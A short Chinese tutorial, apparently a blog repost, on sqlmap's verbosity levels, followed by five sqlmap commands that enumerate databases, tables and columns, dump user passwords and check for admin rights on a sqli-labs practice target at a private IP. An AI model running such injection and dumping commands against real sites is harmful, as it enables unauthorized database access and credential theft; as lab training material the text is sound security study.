如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用-v参数。
共有七个等级,默认为1:
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。
如果你想看到sqlmap发送的测试payload最好的等级就是3。
1、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 1 --dbs 爆库
2、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --tables -D security 爆表
3、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --columns -D security -T users 爆列名
4、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" -v 3 --dump -C id,password,userame -D security -T users 爆内容
5、python sqlmap.py -u "http://192.168.43.70/sqli-labs/Less-1/?id=1" --is-dba 判断当前用户是否为dba
dba权限即管理员权限
原文:https://www.cnblogs.com/mxm0404/p/14880882.html